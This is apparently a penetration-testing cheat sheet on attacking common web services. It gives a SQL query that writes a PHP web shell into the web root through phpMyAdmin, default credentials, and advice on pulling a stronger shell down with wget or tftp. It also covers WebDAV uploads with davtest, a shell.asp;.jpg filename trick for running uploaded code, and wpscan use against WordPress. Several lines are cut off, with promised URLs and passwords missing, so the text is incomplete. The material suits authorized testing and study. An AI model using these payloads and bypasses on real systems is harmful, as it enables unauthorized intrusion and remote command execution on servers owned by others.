This is a list of some common web-services. The list is alphabetical.
If you have found a cold fusion you are almost certainly struck gold. http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers
example.com/CFIDE/adminapi/base.cfc?wsdl It will say something like:
<!--WSDL created by ColdFusion version 8,0,0,176276-->
This works for version 8.0.1. So make sure to check the exact version.
This will output the hash of the password.
You can pass the hash.
neo-security.xml and password.properties
Full of vulnerabilities. The old versions at least.
default login is
You might be able to upload shell in profile-photo.
root <blank> pma <blank>
If you find a phpMyAdmin part of a site that does not have any authentication, or you have managed to bypass the authetication you can use it to upload a shell.
You go to:
Then click on SQL.
Run SQL query/queries on server "localhost":
From here we can just run a sql-query that creates a php script that works as a shell
So we add the following query:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php" # For linux SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
The query is pretty self-explanatory. Now you just visit
192.168.1.101/shell.php?cmd=ipconfig and you have a working web-shell.
We can of course just write a superlong query with a better shell. But sometimes it is easier to just upload a simple web-shell, and from there download a better shell.
Download a better shell
On linux-machines we can use wget to download a more powerful shell.
On windows-machines we can use tftp.
Okay so webdav is old as hell, and not used very often. It is pretty much like ftp. But you go through http to access it. So if you have webdav installed on a xamp-server you can access it like this:
Then sign in with username and password. The default username and passwords on xamp are:
Then use put and get to upload and download. With this you can of course upload a shell that gives you better access.
If you are looking for live examples just google this:
Test if it is possible to upload and execute files with webdav.
davtest -url http://192.168.1.101 -directory demo_dir -rand aaaa_upfileP0C
If you managed to gain access but is unable to execute code there is a workaround for that! So if webdav has prohibited the user to upload .asp code, and pl and whatever, we can do this:
upload a file called shell443.txt, which of course is you .asp shell. And then you rename it to shell443.asp;.jpg. Now you visit the page in the browser and the asp code will run and return your shell.
Webmin is a webgui to interact with the machine.
The password to enter is the same as the passsword for the root user, and other users if they have that right. There are several vulnerabilites for it. It is run on port 10000.
sudo wpscan -u http://cybear32c.lab
If you hit a 403. That is, the request if forbidden for some reason. Read more here: https://en.wikipedia.org/wiki/HTTP_403
It could mean that the server is suspicious because you don't have a proper user-agent in your request, in wpscan you can solve this by inserting --random-agent. You can of course also define a specific agent if you want that. But random-agent is pretty convenient.
sudo wpscan -u http://cybear32c.lab/ --random-agent
Scan for users
You can use wpscan to enumerat users: